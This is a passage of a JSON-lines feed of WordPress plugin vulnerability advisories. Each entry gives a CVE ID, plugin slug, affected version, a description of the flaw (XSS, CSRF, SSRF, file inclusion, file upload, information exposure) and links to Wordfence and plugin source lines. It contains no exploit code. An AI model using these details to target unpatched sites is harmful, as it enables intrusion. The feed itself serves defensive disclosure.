to.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/typer-core\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/typer-core\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/de53b1d8-e38f-42c5-adfc-2b0ce8d6945b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/de53b1d8-e38f-42c5-adfc-2b0ce8d6945b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13555","slug":"1-click-migration","versionImpact":"2.1","description":"The 1 Click WordPress Migration Plugin \u2013 100% FREE for a limited time plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.1. This is due to missing or incorrect nonce validation on the cancel_actions() function. This makes it possible for unauthenticated attackers to cancel a triggered backup via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/1-click-migration\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/1-click-migration\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aee963fa-26b5-4bf0-b52f-095c67fb4834?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aee963fa-26b5-4bf0-b52f-095c67fb4834?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2881","slug":"developer-toolbar","versionImpact":"1.0.3","description":"The Developer Toolbar plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.0.3 through the publicly accessible phpinfo.php script. This makes it possible for unauthenticated attackers to view potentially sensitive information contained in the exposed file.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/developer-toolbar\\\/trunk\\\/views\\\/phpinfo.php#L45\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/developer-toolbar\\\/trunk\\\/views\\\/phpinfo.php#L45\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/developer-toolbar\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/developer-toolbar\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e10ba37a-cd7d-4fc9-8b41-806fa3dc7785?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e10ba37a-cd7d-4fc9-8b41-806fa3dc7785?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4126","slug":"eg-series","versionImpact":"2.1.1","description":"The EG-Series plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's [series] shortcode in all versions up to, and including, 2.1.1 due to insufficient input sanitization and output escaping on user supplied attributes in the shortcode_title function. This makes it possible for authenticated attackers - with contributor-level access and above, on sites with the Classic Editor plugin activated - to inject arbitrary JavaScript code in the titletag attribute that will execute whenever a user access an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/eg-series\\\/trunk\\\/lib\\\/eg-plugin.inc.php#L546\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/eg-series\\\/trunk\\\/lib\\\/eg-plugin.inc.php#L546\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ab518a1b-304d-4b93-b807-65ef3941dd47?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ab518a1b-304d-4b93-b807-65ef3941dd47?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5535","slug":"enigma-buttons","versionImpact":"1.1.3","description":"The e.nigma buttons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'button' shortcode in all versions up to, and including, 1.1.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/enigma-buttons\\\/trunk\\\/enigma-buttons.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/enigma-buttons\\\/trunk\\\/enigma-buttons.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4c570533-1a67-46ad-9d29-35f70ae3bb6a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4c570533-1a67-46ad-9d29-35f70ae3bb6a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7640","slug":"hiweb-export-posts","versionImpact":"0.9.0.0","description":"The hiWeb Export Posts plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 0.9.0.0. This is due to missing or incorrect nonce validation on the tool-dashboard-history.php file. This makes it possible for unauthenticated attackers to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php), via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/hiweb-export-posts\\\/trunk\\\/views\\\/tool-dashboard-history.php#L3\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/hiweb-export-posts\\\/trunk\\\/views\\\/tool-dashboard-history.php#L3\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/hiweb-export-posts\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/hiweb-export-posts\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/38c23f59-8332-49ab-a219-1f5fac8a283c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/38c23f59-8332-49ab-a219-1f5fac8a283c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2757","slug":"waiting","versionImpact":"0.6.2","description":"The Waiting: One-click countdowns plugin for WordPress is vulnerable to authorization bypass due to a missing capability check on 'saveLang' functions in versions up to, and including, 0.6.2. This could lead to Cross-Site Scripting due to insufficient input sanitization and output escaping. This makes it possible for subscriber-level attackers to access functions to save plugin data that can potentially lead to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/waiting\\\/tags\\\/0.6.2\\\/templates\\\/templates.php#L426\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/waiting\\\/tags\\\/0.6.2\\\/templates\\\/templates.php#L426\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/38cc5a39-6ec3-4ce9-b9ad-d4ca5dafe9a7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/38cc5a39-6ec3-4ce9-b9ad-d4ca5dafe9a7?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/waiting\\\/tags\\\/0.6.2\\\/waiting.php#L544\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/waiting\\\/tags\\\/0.6.2\\\/waiting.php#L544\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1895","slug":"getwid","versionImpact":"1.8.3","description":"The Getwid \u2013 Gutenberg Blocks plugin for WordPress is vulnerable to Server Side Request Forgery via the get_remote_content REST API endpoint in versions up to, and including, 1.8.3. This can allow authenticated attackers with subscriber-level permissions or above to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e9c2a942-c14c-4b59-92a7-6946b2e4731b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e9c2a942-c14c-4b59-92a7-6946b2e4731b?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/getwid\\\/tags\\\/1.8.3\\\/includes\\\/rest-api.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/getwid\\\/tags\\\/1.8.3\\\/includes\\\/rest-api.php\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3082","slug":"post-smtp","versionImpact":"2.5.7","description":"The Post SMTP plugin for WordPress is vulnerable to Stored Cross-Site Scripting via email contents in versions up to, and including, 2.5.7 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2935537\\\/post-smtp\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2935537\\\/post-smtp\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6ecd0fa6-4fdb-4780-9560-0bb126800685?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6ecd0fa6-4fdb-4780-9560-0bb126800685?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5230","slug":"tm-woocommerce-compare-wishlist","versionImpact":"1.1.7","description":"The TM WooCommerce Compare & Wishlist plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'tm_woo_wishlist_table' shortcode in versions up to, and including, 1.1.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tm-woocommerce-compare-wishlist\\\/tags\\\/1.1.7\\\/includes\\\/wishlist\\\/wishlist.php#L339\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tm-woocommerce-compare-wishlist\\\/tags\\\/1.1.7\\\/includes\\\/wishlist\\\/wishlist.php#L339\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/771ecb8c-feb1-40ea-b47b-a2ae033b3c87?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/771ecb8c-feb1-40ea-b47b-a2ae033b3c87?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0682","slug":"pagerestrict","versionImpact":"2.5.5","description":"The Page Restrict plugin for WordPress is vulnerable to information disclosure in all versions up to, and including, 2.5.5. This is due to the plugin not properly restricting access to posts via the REST API when a page has been made private. This makes it possible for unauthenticated attackers to view protected posts.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/63f98fd6-eee8-4281-98ea-a267d0442c85?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/63f98fd6-eee8-4281-98ea-a267d0442c85?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/pagerestrict\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/pagerestrict\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1234","slug":"exclusive-addons-for-elementor","versionImpact":"2.6.9","description":"The Exclusive Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via data attribute in all versions up to, and including, 2.6.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1b87fe3d-a88d-477a-8d91-4d7c2dba4a43?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1b87fe3d-a88d-477a-8d91-4d7c2dba4a43?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3042217\\\/exclusive-addons-for-elementor\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3042217\\\/exclusive-addons-for-elementor\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5179","slug":"cowidgets-elementor-addons","versionImpact":"1.1.1","description":"The Cowidgets \u2013 Elementor Addons plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 1.1.1 via the 'item_style' and 'style' parameters. This makes it possible for authenticated attackers, with Contributor-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ebd6acc9-b7df-4cf8-a211-1e39f3abcf79?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ebd6acc9-b7df-4cf8-a211-1e39f3abcf79?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cowidgets-elementor-addons\\\/trunk\\\/inc\\\/widgets-manager\\\/widgets\\\/content\\\/class-ce-posts-carousel.php#L727\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cowidgets-elementor-addons\\\/trunk\\\/inc\\\/widgets-manager\\\/widgets\\\/content\\\/class-ce-posts-carousel.php#L727\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cowidgets-elementor-addons\\\/trunk\\\/inc\\\/widgets-manager\\\/widgets\\\/content\\\/class-ce-posts-grid.php#L582\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cowidgets-elementor-addons\\\/trunk\\\/inc\\\/widgets-manager\\\/widgets\\\/content\\\/class-ce-posts-grid.php#L582\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cowidgets-elementor-addons\\\/trunk\\\/inc\\\/widgets-manager\\\/widgets\\\/content\\\/class-ce-testimonial-carousel.php#L600\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cowidgets-elementor-addons\\\/trunk\\\/inc\\\/widgets-manager\\\/widgets\\\/content\\\/class-ce-testimonial-carousel.php#L600\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cowidgets-elementor-addons\\\/trunk\\\/inc\\\/widgets-manager\\\/widgets\\\/content\\\/class-ce-portfolio-grid.php#L707\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cowidgets-elementor-addons\\\/trunk\\\/inc\\\/widgets-manager\\\/widgets\\\/content\\\/class-ce-portfolio-grid.php#L707\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cowidgets-elementor-addons\\\/trunk\\\/inc\\\/widgets-manager\\\/widgets\\\/content\\\/class-ce-staff-carousel.php#L603\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cowidgets-elementor-addons\\\/trunk\\\/inc\\\/widgets-manager\\\/widgets\\\/content\\\/class-ce-staff-carousel.php#L603\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cowidgets-elementor-addons\\\/trunk\\\/inc\\\/widgets-manager\\\/widgets\\\/content\\\/class-ce-post-navigation.php#L257\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cowidgets-elementor-addons\\\/trunk\\\/inc\\\/widgets-manager\\\/widgets\\\/content\\\/class-ce-post-navigation.php#L257\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6849","slug":"preloader-plus","versionImpact":"2.2.1","description":"The Preloader Plus \u2013 WordPress Loading Screen Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 2.2.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/85e0e1c5-211f-434c-8cc8-1ca676a8c7c2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/85e0e1c5-211f-434c-8cc8-1ca676a8c7c2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/preloader-plus\\\/tags\\\/2.2.1\\\/inc\\\/preloader-plus.php#L351\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/preloader-plus\\\/tags\\\/2.2.1\\\/inc\\\/preloader-plus.php#L351\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/preloader-plus\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/preloader-plus\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8720","slug":"rumbletalk-chat-a-chat-with-themes","versionImpact":"6.3.0","description":"The RumbleTalk Live Group Chat \u2013 HTML5 plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'rumbletalk-admin-button' shortcode in all versions up to, and including, 6.3.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4e620ae8-03fc-43b5-8e8f-5b0884e8eefb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4e620ae8-03fc-43b5-8e8f-5b0884e8eefb?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/rumbletalk-chat-a-chat-with-themes\\\/trank\\\/public\\\/class-rumbletalk-public.php#L128\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/rumbletalk-chat-a-chat-with-themes\\\/trank\\\/public\\\/class-rumbletalk-public.php#L128\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12283","slug":"wp-pipes","versionImpact":"1.4.1","description":"The WP Pipes plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018x1\u2019 parameter in all versions up to, and including, 1.4.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3204551\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3204551\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-pipes\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-pipes\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3aa56fc7-8d48-4149-afa7-8f9885de0674?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3aa56fc7-8d48-4149-afa7-8f9885de0674?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12096","slug":"exhibit-to-wp-gallery","versionImpact":"0.0.2","description":"The Exhibit to WP Gallery WordPress plugin through 0.0.2 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/aff431fa-d984-40de-8a15-21f18db97859\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/aff431fa-d984-40de-8a15-21f18db97859\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2841","slug":"cart66-cloud","versionImpact":"2.3.7","description":"The Cart66 Cloud plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.3.7 through the publicly accessible phpinfo.php script. This makes it possible for unauthenticated attackers to view potentially sensitive information contained in the exposed file.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cart66-cloud\\\/tags\\\/2.3.7\\\/views\\\/admin\\\/html-system-info.php#L26\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cart66-cloud\\\/tags\\\/2.3.7\\\/views\\\/admin\\\/html-system-info.php#L26\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cart66-cloud\\\/tags\\\/2.3.7\\\/views\\\/admin\\\/html-system-info.php#L39\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cart66-cloud\\\/tags\\\/2.3.7\\\/views\\\/admin\\\/html-system-info.php#L39\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cart66-cloud\\\/tags\\\/2.3.7\\\/views\\\/admin\\\/html-system-info.php#L59\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cart66-cloud\\\/tags\\\/2.3.7\\\/views\\\/admin\\\/html-system-info.php#L59\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/cart66-cloud\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/cart66-cloud\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5be01bba-e4f4-4818-9612-fc37b648a349?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5be01bba-e4f4-4818-9612-fc37b648a349?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3917","slug":"baiduseo","versionImpact":"2.0.6","description":"The ????SEO??(????\/??\/Bing\/????) plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the download_remote_image_to_media_library function in all versions up to, and including, 2.0.6. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/baiduseo\\\/tags\\\/2.0.6\\\/inc\\\/index\\\/youhua.php#L371\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/baiduseo\\\/tags\\\/2.0.6\\\/inc\\\/index\\\/youhua.php#L371\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/baiduseo\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/baiduseo\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/70361501-8adc-499a-91d2-cf91fab5934a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/70361501-8adc-499a-91d2-cf91fab5934a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6588","slug":"funnelcockpit","versionImpact":"1.4.2","description":"The FunnelCockpit plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018error\u2019 parameter in all versions up to, and including, 1.4.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick an administrative user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/funnelcockpit\\\/trunk\\\/admin\\\/class-funnelcockpit-admin.php#L433\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/funnelcockpit\\\/trunk\\\/admin\\\/class-funnelcockpit-admin.php#L433\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/df2e744f-e1d6-4380-8e24-e98e9df4dd2f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/df2e744f-e1d6-4380-8e24-e98e9df4dd2f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3081","slug":"wp-mail-logging","versionImpact":"1.11.1","description":"The WP Mail Logging plugin for WordPress is vulnerable to Stored Cross-Site Scripting via email contents in versions up to, and including, 1.11.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. Note: An incomplete fix was released in 1.11.1.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ef20b3e6-d8f4-458e-b604-b46ef16e229e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ef20b3e6-d8f4-458e-b604-b46ef16e229e?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2925728\\\/wp-mail-logging\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2925728\\\/wp-mail-logging\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2923464\\\/wp-mail-logging\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2923464\\\/wp-mail-logging\",\"refsource\":\"MISC\",\"tags\":[]}]"}
